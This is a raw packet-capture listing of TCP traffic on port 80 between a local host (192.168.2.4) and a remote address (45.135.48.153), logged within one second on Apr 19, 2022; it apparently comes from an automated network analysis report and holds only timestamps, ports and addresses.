Apr 19, 2022 16:44:43.203021049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.203071117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.203116894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.203260899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.203367949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.203418016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.203430891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.203536987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.203634024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.203664064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.203784943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.203844070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.203978062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.203996897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.204135895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.204161882 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.204253912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.204301119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.204319954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.204493999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.204549074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.204581022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.204689026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.204744101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.204782009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.204935074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.204982042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.205074072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.205179930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.205230951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.205244064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.205379009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.205425978 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.205491066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.205619097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.205734968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.205786943 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.205818892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.205869913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.205976963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.206017971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.206182003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.206228971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.206324100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.206371069 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.206372023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.206495047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.206656933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.206705093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.206710100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.206762075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.206805944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.206937075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.207173109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.207190037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.207228899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.207248926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.207287073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.207418919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.207468987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.207556963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.207662106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.207714081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.207763910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.207858086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.207973957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.208020926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.208096027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.208144903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.208195925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.208297968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.208343029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.208419085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.208525896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.208617926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.208652020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.208791018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.208853006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.208894014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.208976030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.209041119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.209095955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.209211111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.209260941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.209300995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.209455967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.209501982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.209577084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.209654093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.209707975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.209774017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.209851980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.209898949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.210010052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.210114956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.210160971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.210201025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.210349083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.210400105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.210500002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.210556984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.210700035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.210762024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.210777044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.210824966 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.210921049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211015940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211137056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211190939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.211250067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211299896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.211340904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211451054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211555004 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.211580038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211699963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211818933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211870909 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.211926937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.211977005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.212054014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.212148905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.212289095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.212342024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.212378025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.212424994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.212461948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.212662935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.212737083 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.212790012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.212847948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.212893009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.212928057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.213057041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.213176966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.213241100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.213290930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.213342905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.213417053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.213571072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.213618994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.213680029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.213717937 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.213776112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.213890076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.213973999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.214035034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.214142084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.214159012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.214211941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.214298964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.214396954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.214535952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.214596987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.214632034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.214682102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.214766979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.214854956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.214904070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.215101957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.215342045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.215400934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.215663910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.215861082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.215950012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.216099977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.216300011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.216358900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.216541052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.216773987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.216840982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.216861010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217017889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217096090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217148066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.217255116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217304945 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.217336893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217457056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217629910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217696905 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.217797041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217834949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217879057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.217932940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.217988014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.218070030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.218139887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.218272924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.218337059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.218434095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.218499899 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.218540907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.218632936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.218707085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.218770027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.218817949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.218888044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.218930960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.219024897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.219193935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.219260931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.219309092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.219374895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.219424009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.219506025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.219574928 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.219623089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.219707966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.219829082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.219897985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.219948053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.220010996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.220172882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.220232964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.220300913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.220340014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.220417023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.220572948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.220604897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.220623016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.220688105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.220792055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.220863104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.220937014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.221019983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.221097946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.221157074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.221262932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.221450090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.221654892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.221697092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.221932888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.222136974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.222197056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.222356081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.222414017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.222621918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.222678900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.222816944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.222873926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.222919941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.222975016 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.223062038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.223157883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.223292112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.223345995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.223452091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.223507881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.223578930 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.223618984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.223674059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.223783016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.223822117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.223934889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.223969936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.224098921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.224178076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.224225998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.224342108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.224407911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.224419117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.224550009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.224626064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.224638939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.224785089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.224858046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.224889040 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.224981070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.225052118 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.225096941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.225178957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.225332975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.225389957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.225457907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.225519896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.225557089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.225724936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.225780010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.225780964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.225939989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226017952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226077080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.226095915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226146936 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.226207972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226334095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226457119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226507902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.226618052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226691008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.226739883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226779938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226902008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.226955891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.227055073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.227103949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.227178097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.227269888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.227417946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.227468014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.227507114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.227621078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.227675915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.227688074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.227796078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.227842093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.227941990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.228055954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.228074074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.228154898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.228210926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.228259087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.228398085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.228472948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.228511095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.228627920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.228681087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.228770018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.228871107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.228940964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.228976011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.229099989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.229177952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.229229927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.229326963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.229374886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.229379892 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.229499102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.229620934 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.229676008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:43.229726076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:43.229784966 CEST	49758	80	192.168.2.4	45.135.48.153
